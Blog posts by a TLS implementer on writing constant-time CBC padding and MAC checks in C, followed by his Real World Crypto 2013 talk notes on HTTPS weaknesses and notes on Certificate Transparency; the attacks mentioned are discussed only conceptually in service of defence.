Padding in TLS differs in two respects: the value of the padding bytes is defined and must be checked, and the padding is not required to be minimal. Therefore we must always make memory accesses as if the padding was the maximum length, with an exception only in the case that the record is shorter than the maximum. (Again, the total record length is public information so we don't leak anything by using it.)

Here we use a mask variable (mask), which is all ones for those bytes which should be part of the padding, to discard the result of checking the other bytes. However, our memory access pattern is the same for all padding lengths.

unsigned padding_length = data[length-1];
unsigned good = (length-1)-padding_length;
good = DUPLICATE_MSB_TO_ALL(~good);
unsigned to_check = 256; /* maximum amount of padding, including the length byte. */
if (to_check > length) {
        to_check = length;
}

for (unsigned i = 0; i < to_check; i++) {
        unsigned t = padding_length - i;
        uint8_t mask = DUPLICATE_MSB_TO_ALL(~t);
        uint8_t b = data[length-1-i];
        good &= ~(mask&(padding_length ^ b));
}

If any of the padding bytes had an incorrect value, or the padding length was invalid itself, one or more of the bottom eight bits of good will be zero. Now we can map any value of good with such a zero bit to 0, and leave the case of all ones the same:

good &= good >> 4;
good &= good >> 2;
good &= good >> 1;
good <<= sizeof(good)*8-1;
good = DUPLICATE_MSB_TO_ALL(good);

In a very similar way, good can be updated to check that there are enough bytes for a MAC once the padding has been removed and then be used as a mask to subtract the given amount of padding from the length of the record. Otherwise, in subsequent sections, the code can end up under-running the record's buffer.
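
Putting those pieces together might look like the following sketch. The function name tls_remove_padding, the out_length parameter and the msb_mask helper are assumptions of this example, and it scans 256 bytes so that the length byte and up to 255 padding bytes are all covered.

```c
#include <assert.h>
#include <stdint.h>

/* All ones if the top bit of x is set, otherwise zero. */
static uint32_t msb_mask(uint32_t x) { return 0u - (x >> 31); }

/* Hypothetical wrapper around the TLS padding check. Returns an all-ones
 * mask iff the padding is valid and leaves room for the MAC. *out_length is
 * the length without padding when valid and |length| otherwise.
 * length and mac_size are public; the contents of data are secret. */
static uint32_t tls_remove_padding(const uint8_t *data, uint32_t length,
                                   uint32_t mac_size, uint32_t *out_length) {
        /* Public checks: fast rejection here leaks nothing secret. */
        assert(length >= mac_size + 1 && length < (1u << 30));

        uint32_t padding_length = data[length - 1];
        /* MSB is set iff padding, length byte and MAC don't all fit. */
        uint32_t good = msb_mask(~(length - 1 - mac_size - padding_length));

        uint32_t to_check = 256; /* maximum padding plus the length byte. */
        if (to_check > length) {
                to_check = length;
        }
        for (uint32_t i = 0; i < to_check; i++) {
                /* mask is 0xff while i is within the claimed padding. */
                uint8_t mask = (uint8_t)msb_mask(~(padding_length - i));
                uint8_t b = data[length - 1 - i];
                good &= ~(uint32_t)(mask & (padding_length ^ b));
        }

        /* Collapse the bottom eight bits into a full mask. */
        good &= good >> 4;
        good &= good >> 2;
        good &= good >> 1;
        good <<= 31;
        good = msb_mask(good);

        /* Subtract the padding and its length byte only when valid. */
        *out_length = length - (good & (padding_length + 1));
        return good;
}
```

The returned mask would then be carried forward and combined with the result of the MAC check rather than being branched on.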

Calculating the MAC

All the hash functions that we're concerned with are Merkle–Damgård hashes and nearly all used in TLS have a 64-byte block size (MD5, SHA1, SHA-256). Some review of this family of hash functions is called for:

All these hash functions have an initial state, a transform function that takes exactly 64 bytes of data and updates that state, and a final_raw function that marshals the internal state as a series of bytes. In order to hash a message, it must be a multiple of 64 bytes long and that's achieved by padding. (This is a completely different padding than discussed above!)

In order to pad a message for hashing, a 0x80 byte is appended, followed by the minimum number of zero bytes needed to make the length of the message congruent to 56 mod 64. Then the length of the message in bits (not including the padding) is written as a 64-bit number (big-endian for SHA-1 and SHA-256, little-endian for MD5) to round out the 64 bytes. If the length of the message is 0 or ≥ 56 mod 64 then the padding will cause an extra block to be processed.
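
A small sketch of this padding rule, following the SHA-1/SHA-256 convention of storing the bit length big-endian (MD5 stores it little-endian). The names md_num_blocks and md_pad are invented for this example, and nothing here is constant time.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Number of 64-byte blocks processed for a len-byte message: the message,
 * one 0x80 byte and eight length bytes, rounded up to a whole block. */
static size_t md_num_blocks(size_t len) {
        return (len + 1 + 8 + 63) / 64;
}

/* Writes the padded message to out, which must have room for
 * md_num_blocks(len) * 64 bytes. Returns the padded length. */
static size_t md_pad(const uint8_t *msg, size_t len, uint8_t *out) {
        size_t total = md_num_blocks(len) * 64;
        memcpy(out, msg, len);
        out[len] = 0x80;
        /* Zero everything between the 0x80 byte and the length field. */
        memset(out + len + 1, 0, total - len - 1 - 8);
        /* The length is stored as a count of bits, big-endian. */
        uint64_t bits = (uint64_t)len * 8;
        for (size_t i = 0; i < 8; i++) {
                out[total - 1 - i] = (uint8_t)(bits >> (8 * i));
        }
        return total;
}
```

A 55-byte message still fits in one block (55 + 1 + 8 = 64), while a 56-byte message needs two.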

In TLS, the number of hash blocks needed to compute a message can vary by up to six, depending on the length of the padding and MAC. Thus we can process all but the last six blocks normally because the (secret) padding length cannot affect them. However, the last six blocks need to be handled carefully.

The high-level idea is that we generate the contents of each of the final hash blocks in constant time and hash each of them. For each block we serialize the hash and copy it with a mask so that only the correct hash value is copied out, but the amount of computation is constant.

SHA-384 is the odd one out: it has a 128 byte block size and the serialised length is twice as long, although it is otherwise similar. The example below assumes a 64 byte block size for clarity.

[Figure: the final hash blocks. The application data is followed by the 0x80 byte, zero bytes and the length bytes; index_a, index_b and c are marked.]

We calculate two indexes: index_a and index_b. index_a is the hash block where the application data ends and the 0x80 byte is put. index_b is the final hash block where the length bytes are put. They may be the same, or index_b may be one greater. We also calculate c: the offset of the 0x80 byte in the index_a block.

The arithmetic takes some thought. One wrinkle so far ignored is that additional data is hashed in prior to the application data. TLS uses HMAC, which includes a block containing the masked key and then there are 13 bytes of sequence number, record type etc. SSLv3 has more than a block's worth of padding data, MAC key, sequence etc. These are collectively called the header here. The variable k in the following tracks the starting position of the data for the constant time blocks and includes this header.
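
One way the index arithmetic could be written for a 64-byte block size is sketched below. The struct and function names are invented for this example, and data_length stands for the (secret) number of plaintext bytes once the MAC and padding have been removed. Shifts and masks are used instead of / and % so that no division instruction runs on a secret value.

```c
#include <stdint.h>

struct final_block_indexes {
        uint32_t index_a; /* block that holds the 0x80 byte */
        uint32_t index_b; /* block that holds the length bytes */
        uint32_t c;       /* offset of the 0x80 byte within index_a */
};

/* header_length is public; data_length is secret. */
static struct final_block_indexes compute_indexes(uint32_t header_length,
                                                  uint32_t data_length) {
        /* Offset, from the start of the hashed data, of the 0x80 byte. */
        uint32_t end = header_length + data_length;
        struct final_block_indexes r;
        r.index_a = end >> 6; /* end / 64 */
        r.c = end & 63;       /* end % 64 */
        /* The eight length bytes spill into the next block when c > 55. */
        r.index_b = (end + 8) >> 6;
        return r;
}
```

With a TLS header of 64 + 13 = 77 bytes, 42 bytes of data put the 0x80 byte at offset 55 of block 1 and the length still fits in that block; with 43 bytes it does not and index_b becomes 2.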

for (i = num_starting_blocks; i <= num_starting_blocks+variance_blocks; i++) {
        uint8_t block[64];
        uint8_t is_block_a = constant_time_eq(i, index_a);
        uint8_t is_block_b = constant_time_eq(i, index_b);
        for (j = 0; j < 64; j++) {
                uint8_t b = 0;
                if (k < header_length) {
                        b = header[k];
                } else if (k < data_plus_mac_plus_padding_size + header_length) {
                        b = data[k-header_length];
                }
                k++;

                uint8_t is_past_c = is_block_a & constant_time_ge(j, c);
                uint8_t is_past_cp1 = is_block_a & constant_time_ge(j, c+1);
                /* If this is the block containing the end of the
                 * application data, and we are at, or past, the offset
                 * for the 0x80 value, then overwrite b with 0x80. */
                b = (b&~is_past_c) | (0x80&is_past_c);
                /* If this is the block containing the end of the
                 * application data and we're past the 0x80 value then
                 * just write zero. */
                b = b&~is_past_cp1;
                /* If this is index_b (the final block), but not
                 * index_a (the end of the data), then the 64-bit
                 * length didn't fit into index_a and we're having to
                 * add an extra block of zeros. */
                b &= ~is_block_b | is_block_a;

                /* The final eight bytes of one of the blocks contains the length. */
                if (j >= 56) {
                        /* If this is index_b, write a length byte. */
                        b = (b&~is_block_b) | (is_block_b&length_bytes[j-56]);
                }
                block[j] = b;
        }

        md_transform(md_state, block);
        md_final_raw(md_state, block);
        /* If this is index_b, copy the hash value to |mac_out|. */
        for (j = 0; j < md_size; j++) {
                mac_out[j] |= block[j]&is_block_b;
        }
}
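
The loop above relies on constant_time_eq and constant_time_ge, which aren't spelled out in this post. One possible sketch, assuming both arguments are below 2^31 so that the top bit of a difference reliably signals a borrow:

```c
#include <stdint.h>

/* All ones if the top bit of x is set, otherwise zero. */
static uint32_t msb_mask(uint32_t x) { return 0u - (x >> 31); }

/* Returns 0xff if a >= b and 0x00 otherwise. Requires a, b < 2^31:
 * a - b then has its top bit set exactly when b > a. */
static uint8_t constant_time_ge(uint32_t a, uint32_t b) {
        return (uint8_t)msb_mask(~(a - b));
}

/* Returns 0xff if a == b and 0x00 otherwise. Requires a, b < 2^31:
 * (a ^ b) - 1 wraps around to all ones only when a ^ b is zero. */
static uint8_t constant_time_eq(uint32_t a, uint32_t b) {
        return (uint8_t)msb_mask((a ^ b) - 1);
}
```

Neither function branches or indexes memory based on its inputs, which is what the definition of constant-time used here asks for.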

Finally, the hash value needs to be used to finish up either the HMAC or SSLv3 computations. Since this involves processing an amount of data that depends only on the MAC length, and the MAC length is public, this can be done in the standard manner.

In the case of SSLv3, since the padding has to be minimal, only the last couple of hash blocks can vary and so need to be processed in constant time. Another optimisation is to reduce the number of hash blocks processed in constant time if the (public) record length is small enough that some cannot exist for any padding value.

The above code is a problem to implement because it uses a different hash API than the one usually provided. It needs a final_raw function that doesn't append the hash padding, rather than the common final function, which does. Because of this implementers may be tempted to bodge this part of the code and perhaps the resulting timing side-channel will be too small to exploit, even with more accurate local attacks. Or perhaps it'll be good for another paper!

Extracting the MAC from the record.

We can't just copy the MAC from the record because its position depends on the (secret) amount of padding. The obvious, constant-time method of copying out the MAC is rather slow so my thanks to Emilia Kasper and Bodo Möller for suggesting better ways of doing it.

We can read every location where the MAC might be found and copy to a MAC-sized buffer. However, the MAC may be byte-wise rotated by this copy so we need to do another mac_size² operations to rotate it in constant-time (since the amount of rotation is also secret):

unsigned mac_end = length;
unsigned mac_start = mac_end - md_size;
/* scan_start contains the number of bytes that we can ignore because the
 * MAC's position can only vary by 255 bytes. */
unsigned scan_start = 0;
if (public_length_inc_padding > md_size + 255 + 1) {
        scan_start = public_length_inc_padding - (md_size + 255 + 1);
}
unsigned char rotate_offset = (mac_start - scan_start) % md_size;

memset(rotated_mac, 0, sizeof(rotated_mac));
for (unsigned i = scan_start; i < public_length_inc_padding; i += md_size) {
        for (unsigned j = 0; j < md_size; j++) {
                unsigned char mac_started = constant_time_ge(i + j, mac_start);
                unsigned char mac_ended = constant_time_ge(i + j, mac_end);
                unsigned char b = 0;
                if (i + j < public_length_inc_padding) {
                        b = data[i + j];
                }
                rotated_mac[j] |= b & mac_started & ~mac_ended;
        }
}

/* Now rotate the MAC */
memset(out, 0, md_size);
for (unsigned i = 0; i < md_size; i++) {
        unsigned char offset = (md_size - rotate_offset + i) % md_size;
        for (unsigned j = 0; j < md_size; j++) {
                out[j] |= rotated_mac[i] & constant_time_eq_8(j, offset);
        }
}

Finally, the MAC should be compared in constant time: XOR each byte of the calculated MAC with the corresponding byte of the given MAC and OR the results into a single accumulator. If the accumulator is zero at the end, then the MACs match. In order to avoid leaking timing information, the mask value from the padding check at the very beginning should be carried throughout the process and ANDed with the final value from the MAC compare.
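
A minimal sketch of that final comparison. The function name mac_compare and its padding_good parameter (the all-ones or all-zero mask from the padding check) are assumptions of this example.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns all ones iff the two MACs are equal and padding_good is all
 * ones, otherwise zero. mac_size is public. */
static uint32_t mac_compare(const uint8_t *calculated, const uint8_t *given,
                            size_t mac_size, uint32_t padding_good) {
        uint32_t diff = 0;
        for (size_t i = 0; i < mac_size; i++) {
                /* Any differing bit in any byte sticks in diff. */
                diff |= (uint32_t)(calculated[i] ^ given[i]);
        }
        /* diff is in [0, 255], so diff - 1 has its top bit set only
         * when diff is zero. */
        uint32_t equal = 0u - ((diff - 1) >> 31);
        return equal & padding_good;
}
```

The loop always visits every byte, so the time taken doesn't reveal where the first mismatch occurred.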

Limitations of our model

We started out by defining constant-time with a specific model. But this model fails in a couple of ways:

Firstly, extracting the MAC as detailed above is rather expensive. On some chips all memory accesses within a cache-line are constant time and so we can relax our model a little and use a line-aligned buffer to perform the rotation in when we detect that we're building on such a platform.

Secondly, when I sent an early version of the OpenSSL patch to the paper's authors for them to test, they reported that they found a timing difference! I instrumented the OpenSSL code with the CPU cycle counter and measured a median time of 18020 cycles to reject a record with a large amount of padding but only 18004 cycles with small padding.

This difference may be small, but it was stable. To cut a long story short, it came from this line:

unsigned char rotate_offset = (mac_start - scan_start) % md_size;

When the padding was larger, the MAC started earlier in the record (because the total size was the same). So the argument to the DIV instruction was smaller and DIV, on Intel, takes a variable amount of time depending on its arguments!

The solution was to add a large multiple of md_size to make the DIV always take the full amount of time (and to do it in such a way that the compiler, hopefully, won't be able to optimise it away). A difference of under 20 CPU cycles is probably too small to exploit, but since we've already “solved” this problem twice, I'd rather not have to worry in the future.
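
A sketch of what such a fix might look like. The names rotate_offset_spoiled and div_spoiler are illustrative, and the trick as written assumes md_size is even (true of the 16, 20, 32 and 48 byte MACs in question), so that (md_size / 2) << 24 is an exact multiple of md_size.

```c
#include <assert.h>
#include <stdint.h>

/* Computes (mac_start - scan_start) % md_size, but with a large multiple
 * of md_size added first so that the dividend always has high bits set. */
static uint32_t rotate_offset_spoiled(uint32_t mac_start, uint32_t scan_start,
                                      uint32_t md_size) {
        /* Public preconditions. */
        assert(md_size != 0 && md_size % 2 == 0 && md_size <= 64);
        assert(mac_start >= scan_start);

        /* (md_size / 2) * 2^24 == md_size * 2^23, a multiple of md_size,
         * so adding it doesn't change the remainder. */
        uint32_t div_spoiler = (md_size >> 1) << 24;
        return (div_spoiler + mac_start - scan_start) % md_size;
}
```

Whether a given compiler preserves the addition is something that would need checking in the generated code.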

Real World Crypto 2013

(These are my notes for a talk that I gave last week at Real World Crypto. The premise of the conference is that it brings together theoretical cryptographers and practitioners. So this talk is aimed at theoretical cryptographers but it's fairly simple as I don't have anything complex worth saying to real cryptographers! Slides for other talks are linked from the program page and Rogaway's are relevant to this talk.

Note that this isn't a transcript: I actually say more words than this, but it contains the main points.)

Hello all.

For those who don't know me, I'm Adam Langley. I work at Google, mostly on our serving side HTTPS infrastructure these days. But I also still do some work on Chrome's SSL stack from time to time.

When I was asked to come up with a title of a talk I picked “Things that bit us, things we fixed and things that are waiting in the grass” with reference to HTTPS. Partly because that's what I know about but also because HTTPS is the only place where most people knowingly interact with public crypto, so it's one of the few examples of real world crypto at really large, really messy scales.

I could also have titled this talk “Know your enemy” because your real enemy is not trying to achieve an advantage with greater than negligible probability. As I hope to convince you, your enemy is me. I am the idiot who will mess up the implementation of your lovely cryptosystem. Your 128-bit security level is worthless in the face of my stupidity and so I'm here to seek your help in making my life easier and, therefore, everything more secure.

But before we get into anything crypto related, I'd like to set the scene. By and large, transport security on the Internet is doing OK because few people bother to attack it. If you want to steal banking credentials, you can get malware toolkits that will work on a large enough fraction of machines to be useful - e.g. using the Java exploit made public this week. If you want to steal passwords, you can SQL inject the site and reverse the hashes (if the site even bothered to hash), or just use the Ruby on Rails exploit made public this week. Given the level of password reuse, it doesn't even have to be the same site! Economically, attacking the transport doesn't make sense for many attackers and so they don't do it.

If you do want to attack the transport, by far the best methods are SSL stripping, mixed scripting and insecure cookie vulnerabilities.

SSL stripping means that, when the user types in example.com, since the default scheme is unencrypted, the browser makes an insecure request. The attacker can simply answer that request and proxy the entire site while removing any attempts to upgrade to HTTPS. In the majority of cases, the user will never notice.

Mixed scripting results from pages that source Javascript, CSS or plugins from an HTTP URL. The request is made insecurely but the response is trusted with the same authority as the HTTPS origin that requested it. On sites that serve both HTTP and HTTPS, mixed scripting is endemic.

Lastly, cookies are secrets that the client sends to authenticate requests. If, when creating a cookie, the server doesn't set the secure flag, the client will also send the same cookie over unencrypted connections. Since forgetting to set that flag doesn't break anything in normal operation, it happens fairly often.

Oh, and all that is assuming that any transport security is used at all. HTTP is still much more common than HTTPS.

I've breezed over those issues, but the important point is that none of them involve crypto, they're all systems issues. On the whole, the crypto is doing great in comparison to everything else!

I'll cycle back to those issues towards the end but I wanted to give some perspective as I'll be talking about the crypto a lot, since this is Real World Crypto, but crypto is only a small part of web security.

When writing this talk I sat down and made a list of the cryptographic issues that have bitten HTTPS over the past few years and tried to group them in order to make points that I think would be useful for the research community. I didn't end up using them all, so this is hardly an exhaustive list and I used some things twice, but here they are:

Go beyond a paper

  1. CRIME (compression leaks.)
  2. BEAST (CBC vs adaptive, chosen plaintext.)

The first group of issues I called ‘go beyond a paper’:

The CRIME attack resulted from the attacker having partial, chosen plaintext abilities on a channel which was performing compression. This applied to both TLS, which supports compression, and SPDY, an HTTP replacement that runs over TLS that applied compression internally. Most major HTTPS sites don't support TLS compression so SPDY was the bigger hole, but SPDY is a relatively new protocol and the idea that compression can leak information isn't. I can easily find it going back ten years (“Compression and Information Leakage of Plaintext”, Kelsey, 2002) and here's what I said on the SPDY mailing list before the CRIME work:

With a good model of zlib, I think you could extract a ~40 byte cookie with ~13K requests. That's a practical attack and would make a great paper if someone has the time.

Of course, I never had the time but we did start working on a better compression scheme to solve the issue.

But SPDY was done by smart networking folks. Since the compression leak issues weren't known widely enough at the time, they picked gzip as a seemingly reasonable compression algorithm. It wasn't clearly stupid to compose TLS and gzip and yet it blew up when they did so. Had the Kelsey paper instead been a splashy, public demonstration, as CRIME was, then it's possible that the idea would have sunk into the collective memory to the point where simply using gzip wouldn't have seemed so reasonable. As it is, we're now using a horrible gzip hack to segment cookies and other sensitive headers from the attacker controlled values, although the replacement compression is mostly done, pending SPDY 4.

So the first idea in this section is that it's OK to make a splash in order to get some new idea into the minds of the developer community in general.

Somewhat similarly, the origins of the BEAST attack date back to at least 2002 in the context of SSH (Möller, 2002).

In this case, Rizzo and Duong contacted the major SSL stacks prior to their work going public with a clear case that it was worth looking into. This, at least from my point of view, is very welcome! Please do this if you can. You can contact me if nothing else and I can rope in all the other usual suspects. Please set a clear go-public date and allow us to share the facts of the matter with other major vendors.

In the case of BEAST, this produced a rare example of major browsers breaking things together for the common good. The breakage wasn't trivial: we took out Disneyland Tokyo's online ticketing system amongst many others, but we got it deployed.

So the second point of this group is that you should consider treating it like a security disclosure if it's warranted. We don't bite!

The world often sucks

  1. Hash collisions in MD5
  2. BEAST
  3. Downgrade attacks

The second group I put together under the title ‘the world often sucks’.

I'm afraid that sometimes it takes a while to make changes even if we are given a very clear demonstration of the issue. After a very clear demo of MD5 collisions causing vulnerabilities in certificate issuance in 2008 it still took years to remove support for it. Other remedial actions were taken: public CAs were required to use random serial numbers and stopped using MD5 for new certificates. But it wasn't until early 2012 that Chrome removed support for MD5 in signatures. Sadly, many MITM proxies still used MD5 and, despite giving them lots of notice, they didn't do anything and we broke quite a few people with that change.

Of course, later in the year it was found that Flame broke Microsoft's code signing with an MD5 collision. Maybe that'll be enough to convince people to move.

But the point of this section is to encourage people to think about workarounds because the ‘right fix’ often isn't feasible. For hash collisions we have randomised serial numbers and although we might like everyone to be using SHA-256 or SHA-3, realistically those randomised serial numbers are going to be buttressing SHA-1 for quite some time to come.

Marc Stevens talked earlier about how to detect SHA-1 collisions given only one of the colliding messages. That's great! That's absolutely something that we can put into certificate validation now and hopefully prevent problems in the future.

In relation to BEAST: I mentioned that the core weakness had been known since 2002 and, because of that, there was even a workaround in OpenSSL for it: empty fragments. By sending an empty CBC fragment before each real record, the MAC would effectively randomise the IV. However, empty fragments caused compatibility issues because some SSL stacks returned a zero length when encountering them and higher layers of the code took this to be EOF. Because of that, the workaround was never widely enabled.

In the course of discussing BEAST another workaround was proposed: 1/n-1 record splitting. Rather than putting an empty fragment before each record, include a single byte of the plaintext. The protection isn't quite as good, but it solves the EOF problem. Some servers still broke because they assumed that the complete HTTP request would come in a single read, but the lower rate of problems probably made BEAST mitigation viable.
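
The splitting itself is simple. As a sketch, assuming a hypothetical record_writer callback that MACs, pads, encrypts and sends one record (none of these names come from a real SSL stack):

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical callback that turns one plaintext fragment into one CBC
 * record and sends it. Returns 1 on success and 0 on failure. */
typedef int (*record_writer)(void *ctx, const uint8_t *fragment, size_t len);

/* 1/n-1 splitting: send the first byte in a record of its own, then the
 * remaining n-1 bytes in a second record. */
static int write_split(record_writer write_record, void *ctx,
                       const uint8_t *plaintext, size_t n) {
        if (n == 0) {
                return 1; /* nothing to send, and no empty fragment */
        }
        if (n > 1) {
                if (!write_record(ctx, plaintext, 1)) {
                        return 0;
                }
                plaintext += 1;
                n -= 1;
        }
        return write_record(ctx, plaintext, n);
}

/* Example writer that only records the fragment lengths it was given. */
struct split_log {
        size_t lens[4];
        size_t count;
};

static int log_record(void *ctx, const uint8_t *fragment, size_t len) {
        struct split_log *log = ctx;
        (void)fragment;
        if (log->count >= 4) {
                return 0;
        }
        log->lens[log->count++] = len;
        return 1;
}
```

Passing log_record and a 10-byte buffer to write_split yields two fragments of 1 and 9 bytes. A real stack would apply this only where it is needed, such as application data under CBC ciphersuites.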

Lastly, there's the first of our snakes in the grass (problems that are still pending to bite us): SSLv3 downgrade. Since there exist so many broken servers and network middleboxes on the Internet that can't handle TLS version negotiation, in the event of a TLS handshake failure browsers will fall back to SSLv3. However, SSLv3 doesn't support all of the features that TLS does. Most significantly from my point of view, it doesn't support ECDHE, which Google servers use. So a network attacker can trigger a fallback and downgrade a capable client to a non-forward secure ciphersuite.

This is obviously not good. The correct fix is to remove the fallback to SSLv3 of course, but that's sadly not viable right now. Instead, as a workaround, Yngve (formerly of Opera) suggested using the TLS renegotiation extension as a signal that a server is reasonably recent and therefore we shouldn't have performed the fallback.

Numbers from Chrome indicate that a high fraction of the servers that we perform fallback for are renego patched, suggesting that's a bad signal and we should instead create a different one. Although maybe the number of fallbacks is dominated by transient network problems and that's skewing the data. Eric Rescorla has suggested replicating the TLS version negotiation using ciphersuite values. It's something that we will hopefully address in one way or another in 2013.

So that's the point of this group: please consider workarounds because we can't always manage to deploy the ‘right’ fix.

Side-channels are a big deal.

  1. RSA PKCS#1 v1.5 padding oracles ("Million message attack")
  2. CBC padding oracles (Vaudenay's attack)
  3. Timing attacks against RSA CRT.
  4. Side-channel attacks against AES
  5. Side-channel attacks against group operations

This big group is about the fact that side channels are a big deal. Writing constant-time code is a very odd corner of programming and not something that can be easily tested. I have a valgrind hack called ctgrind that allows for some automated testing, but it certainly has its limitations.

But what does constant-time even mean? There's the obvious definition: the CPU runs for the same amount of time, independent of any secret inputs. But CPUs are preemptively multitasked and have frequency scaling and thermal limiting these days so that's not a very useful definition in practice. A more workable definition is that if the code were to be run on an abstract Von Neumann machine, then the trace of memory fetches is identical for all secret inputs. That means that the trace of instructions fetched and data accesses is constant for all secret inputs. That takes care of all the obvious problems.
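
As a small illustration of that definition, here is a sketch of a table lookup by a secret index. The function name ct_lookup is invented for this example, and it assumes the table length and index are below 2^31. Every entry is read on every call, so the trace of memory fetches doesn't depend on the index.

```c
#include <stddef.h>
#include <stdint.h>

/* Returns table[secret_index], or zero if the index is out of range,
 * reading every entry so the access pattern is independent of the index. */
static uint8_t ct_lookup(const uint8_t *table, size_t table_len,
                         uint32_t secret_index) {
        uint8_t result = 0;
        for (size_t i = 0; i < table_len; i++) {
                uint32_t diff = (uint32_t)i ^ secret_index;
                /* 0xff when i == secret_index, otherwise 0x00. */
                uint8_t is_match = (uint8_t)(0u - ((diff - 1) >> 31));
                result |= table[i] & is_match;
        }
        return result;
}
```

The obvious table[secret_index] would fail the definition because the address fetched depends on the secret.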

In practice, it can be useful to relax the definition a little and require only that the set of cache lines accessed for data is constant, rather than the exact addresses. In practice CPUs often fetch whole cache lines at a time and using that fact can lead to speedups at the cost of having to know the cache line length of the CPU.

This model assumes that the individual instructions themselves are constant time. As a research topic it would be interesting to know how variable time CPU instructions affect this. For example, from the Intel optimisation manual:

The latency and throughput of IDIV in Enhanced Intel Core micro-architecture varies with operand sizes and with the number of significant digits of the quotient of the division.

Is this a problem, cryptographically? I don't know. I think multiplies on ARM are variable time too. They are on PowerPC, but that's a much more obscure platform.

As a researcher, what's there to keep in mind with respect to constant-time implementations? Firstly, know that Moore's law will never help you. CPUs may get faster, but the amount of data that we need to process is increasing just as fast, if not faster. So you can't assume that the slower, constant time code will become viable in time - you have to be constant time from the start.

Even having a non-constant time implementation is a danger. There are usually two sides to a protocol and I may not control the software on the other side. If I specify AES in a protocol then I have to consider that it may well be a non-constant time implementation. I just made up the term ‘implementation ecosystem’ for this. AES is very difficult to implement securely in software: good implementations are still topics for research papers. So the implementation ecosystem for AES is terrible! There are lots and lots of side-channel vulnerable implementations out there because no normal person, given the AES spec, will produce a secure implementation.

If we're aiming for a 128-bit security level then that possibility is a much larger problem than many other, more traditional crypto concerns.

So, for new primitives, you may want to produce solid implementations for different platforms to seed the implementation ecosystem. Not just reference implementations, but ones that are good enough that they dominate the set of implementations. For example, if I specify curve25519 in a protocol, I can be pretty sure that everyone is going to be using djb's reference code. That's a major advantage.

You should consider what an implementation is going to look like when designing. Of course, building a solid implementation will make sure that you end up considering this, so that's another good reason. There are certain patterns that are inherently dangerous: square-and-multiply loops, for example. You should recognise that and make sure that even the description of the algorithm includes countermeasures. Binary fields are another pattern that is very likely to result in non-constant time code.

Lastly, please don't assume that CPU changes are going to solve your constant-time or performance problems. Intel have added specific instructions for AES and binary fields in their latest chips and, while that does have some benefit, they will be a small fraction of all chips for a very long time. The chance of both sides of a connection having these chips is even smaller.

Cryptographic Room 101.

Room 101 is a fairly long running British TV show where people nominate things they dislike to put into Room 101, which banishes them from the world. Based on the above I've a number of things that I'd like to put into Room 101, from least controversial to most. These are more specific points than the general ones that I just made and I'd like to see if anyone in the room disagrees with me!

1. MAC then Encrypt.

I hope that everyone agrees on this. Of course, it's pretty ubiquitous in the world today. Just because I want to banish something doesn't mean that I'm not going to spend years dealing with it in the future!

2. CBC mode.

With all the problems of chosen plaintexts, padding oracles etc I think it's time to get rid of CBC mode forever. Although it's possible to implement it securely, it's been done wrong for so long and is so easy to mess up, I think it's best to get rid of it.

3. ‘Sudden death’ entropy failure: plain DSA.

DSA (and ECDSA) has a very unfortunate property that an entropy failure leaks the private key. Even a slight bias over many signatures can be exploited. This is ridiculous. As Nadia and Debian have demonstrated, entropy failures do happen and they are inherently very bad. But that's not a reason to amplify them! By hashing in the private key and message, this problem can be avoided. So please consider what happens when your nonces are actually ntwices.
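
To see why, consider the simplest failure, where the same nonce k is used to sign two different messages. The sketch below uses the standard DSA equations with private key x, nonce k and hash H; the two signatures share the same r because r depends only on k.

```latex
% DSA signature on message m_i with private key x and nonce k:
%   r = (g^k \bmod p) \bmod q, \qquad s_i = k^{-1}\,(H(m_i) + x r) \bmod q
\begin{align*}
s_1 - s_2 &\equiv k^{-1}\bigl(H(m_1) - H(m_2)\bigr) \pmod{q} \\
k &\equiv \bigl(H(m_1) - H(m_2)\bigr)\,(s_1 - s_2)^{-1} \pmod{q} \\
x &\equiv \bigl(s_1 k - H(m_1)\bigr)\, r^{-1} \pmod{q}
\end{align*}
```

If k is instead derived from a hash of the private key and the message, a repeated k implies a repeated message, so the two signatures are identical and the subtraction above yields nothing.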

4. AES-GCM.

I've saved the really controversial one for last!

AES-GCM so easily leads to timing side-channels that I'd like to put it into Room 101. It took a decade of research to produce solid, high-speed, constant time AES implementations and they are very complex. In that decade, many, many non-constant time AES implementations have found their way into everything, poisoning the ecosystem when it comes to using AES.

I haven't seen any research on extracting the key from GHASH, but I've certainly seen vulnerable implementations and there's every reason to believe that it's possible. Most GHASH implementations look like AES implementations from 10 years ago. I'm aware of one, reasonable, constant-time AES-GCM implementation (Käsper and Schwabe, CHES 2009), but it runs at 22 cycles/byte on a Core2.

If you have a recent Intel chip, and software that implements AES-GCM using the specific instructions provided, then it's great. But most chips don't have that and I think it would have been much more preferable to pick an AEAD that's easy to securely implement everywhere and then speed it up on certain chips.

But it's still much better than AES-CBC I guess!

(At this point I cycled back to talking about the larger transport security issues and how browsers are addressing them with HSTS, mixed script blocking etc. But I've written about that before.)

Certificate Transparency

These are my notes for a talk that I gave today at IETF 85. For more details, see the draft.

Certificates are public statements that everyone trusts, but they aren't public record. Other critical details about companies are generally public record, their address, directors etc, but not their public key. Why not? Work like the EFF Observatory already means that CA customer lists, which they might consider confidential, are public.

If certificates were public record then you would be able to see what CAs are asserting about you, and hopefully correct any mistakes. I would very much like to know the set of valid certificates within google.com at any given time. I know about the real ones, of course, but I don’t know that there aren’t others. At the moment, there's no accountability for CAs unless you get really, publicly caught screwing up.

However, there is a class of certificates that we don't want published: internal names. Some companies get certificates from a real CA for their internal networks and those names should not be published. So we'll keep that in mind as we work out a design.

How might we achieve this? Well, we could have CAs publish the certificates that they issue. That's a good start, and actually useful to some degree, but you'll probably admit that this is weaker than we might like, so how do we make it stronger?

So that's our design goal, now let's talk about the constraints:

Firstly, we aren't going to update every HTTPS server on the planet. Any design must be incrementally deployable and, initially, we are talking about HTTPS. Hopefully any design would be generally applicable, but HTTPS is what we have in mind right now.

Secondly, no blocking lookups. Making calls to a third-party during certificate validation is very convenient, but it's just too costly. It creates latency when it's working and a disaster when it's not. Too many networks filter too much for it to be dependable and we've never managed to make it work for OCSP, so there's little chance that it'll work for this.

So whatever information we need to get to the client has to be in the handshake, and anything that the client needs to report back has to be asynchronous.

We had our straw-man proposal where we just ask CAs to publish their certificate stream, but we want to do better because that only works when the CA is simply mistaken. So the problem that we need to address is how do clients know that a certificate they receive has been published at all?

